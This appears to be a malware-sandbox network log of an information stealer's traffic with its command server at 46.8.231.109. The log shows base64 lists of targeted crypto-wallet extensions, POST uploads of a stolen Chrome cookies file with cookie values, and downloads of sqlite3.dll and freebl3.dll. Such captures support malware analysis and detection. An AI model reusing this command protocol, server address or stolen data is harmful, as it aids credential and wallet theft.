                                                                                                                                                                                                                                Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                                                                                                                                                                Sep 21, 2024 13:34:14.978317022 CEST1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                                                                                                                Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                                                                                                                                                                                                                Sep 21, 2024 13:34:14.978333950 CEST1236INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
                                                                                                                                                                                                                                Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
                                                                                                                                                                                                                                Sep 21, 2024 13:34:14.978928089 CEST1236INData Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48
                                                                                                                                                                                                                                Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
                                                                                                                                                                                                                                Sep 21, 2024 13:34:14.978945017 CEST896INData Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58
                                                                                                                                                                                                                                Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
                                                                                                                                                                                                                                Sep 21, 2024 13:34:14.978962898 CEST1236INData Raw: 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 4e 68 5a 6d 56 51 59 57 78 38 62 47 64 74 63 47 4e 77 5a 32 78 77 62 6d 64 6b 62 32 46 73 59 6d 64 6c 62 32 78 6b 5a 57 46 71 5a 6d 4e 73 62 6d 68 68 5a 6d 46 38 4d 58 77 77 66 44
                                                                                                                                                                                                                                Data Ascii: amthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFdhbGxldHxtbW1qYmNmb2Zjb25rYW5uam9uZm1qamFqcGxsZGRiZ3wxfDB8MHx
                                                                                                                                                                                                                                Sep 21, 2024 13:34:14.978976965 CEST268INData Raw: 64 48 78 71 61 57 6c 6b 61 57 46 68 62 47 6c 6f 62 57 31 6f 5a 47 52 71 5a 32 4a 75 59 6d 64 6b 5a 6d 5a 73 5a 57 78 76 59 33 42 68 61 33 77 78 66 44 42 38 4d 48 78 55 54 30 34 67 56 32 46 73 62 47 56 30 66 47 35 77 61 48 42 73 63 47 64 76 59 57
                                                                                                                                                                                                                                Data Ascii: dHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF8MHwwfFVuaXN3YXAgRXh0ZW5zaW9ufG5ucG1mcGxrZm9nZnBtY25ncGxobmJ
                                                                                                                                                                                                                                Sep 21, 2024 13:34:15.158870935 CEST467OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----DGCGDBGCAAEBFIECGHDG
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Content-Length: 268
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 2d 2d 0d 0a
                                                                                                                                                                                                                                Data Ascii: ------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="message"fplugins------DGCGDBGCAAEBFIECGHDG--
                                                                                                                                                                                                                                Sep 21, 2024 13:34:15.346508980 CEST335INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:15 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Length: 108
                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                                                                                                                Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                                                                                                                Sep 21, 2024 13:34:15.607573986 CEST200OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BKJEGDGIJECGCBGCGHDG
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Content-Length: 8583
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:34:15.607651949 CEST8583OUTData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 45 47 44 47 49 4a 45 43 47 43 42 47 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61
                                                                                                                                                                                                                                Data Ascii: ------BKJEGDGIJECGCBGCGHDGContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------BKJEGDGIJECGCBGCGHDGContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                                Sep 21, 2024 13:34:15.867799997 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:15 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Sep 21, 2024 13:34:16.538206100 CEST91OUTGET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:34:16.871813059 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:16 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
                                                                                                                                                                                                                                ETag: "10e436-5e7eeebed8d80"
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Content-Length: 1106998
                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                                                                                                                                                                Sep 21, 2024 13:34:16.871824980 CEST1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: #N@B/81s:<R@B/92P @B
                                                                                                                                                                                                                                Sep 21, 2024 13:34:16.872633934 CEST1236INData Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26
                                                                                                                                                                                                                                Data Ascii: tu.|$\$4$|$\$4$du1Hga[^_]&+C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q
                                                                                                                                                                                                                                Sep 21, 2024 13:34:18.022578955 CEST950OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----JKJECBAAAFHIIEBFCBKF
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Content-Length: 751
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 43 42 41 41 41 46 48 49 49 45 42 46 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 43 42 41 41 41 46 48 49 49 45 42 46 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 43 42 41 41 41 46 48 49 49 45 42 46 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: ------JKJECBAAAFHIIEBFCBKFContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------JKJECBAAAFHIIEBFCBKFContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------JKJECBAAAFHIIEBFCBKFContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwODEzMDAJMVBfSkFSCTIwMjMtMTAtMDUtMDkKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMzAwNDk5CU5JRAk1MTE9azl0VDNxN1lmaDFueF9GU2wwNkY1VUVfdmRhRlFyZWlHS2UxYUROODNNZXZlRDdQTDFSWlh2YTRzLW5GYzl3YVFpOUx0S2F2dVRJYmE4TVVrb0d1NThFOEU4MWd3Ql9UV0o0TmctTGZDdnpoZW03ck5yaFpRMmFHdkpaOWcyVFlocXgyVzJPNEU3dUhRelBrM3Z1THZNTHhGWFpzcUU2TmRBVmlRREVDR3BvCg==------JKJECBAAAFHIIEBFCBKF--
                                                                                                                                                                                                                                Sep 21, 2024 13:34:18.254498005 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:18 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=93
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Sep 21, 2024 13:34:18.784985065 CEST562OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJ
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Content-Length: 363
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: ------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="file"------FHDAFIIDAKJDGDHIDAKJ--
                                                                                                                                                                                                                                Sep 21, 2024 13:34:19.020761967 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:18 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=92
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Sep 21, 2024 13:34:20.970706940 CEST562OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----JJJDGIECFCAKKFHIIIJE
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Content-Length: 363
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: ------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="file"------JJJDGIECFCAKKFHIIIJE--
                                                                                                                                                                                                                                Sep 21, 2024 13:34:21.200234890 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:21 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=91
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Sep 21, 2024 13:34:22.692744017 CEST91OUTGET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:34:22.869007111 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:22 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                ETag: "a7550-5e7ebd4425100"
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Content-Length: 685392
                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
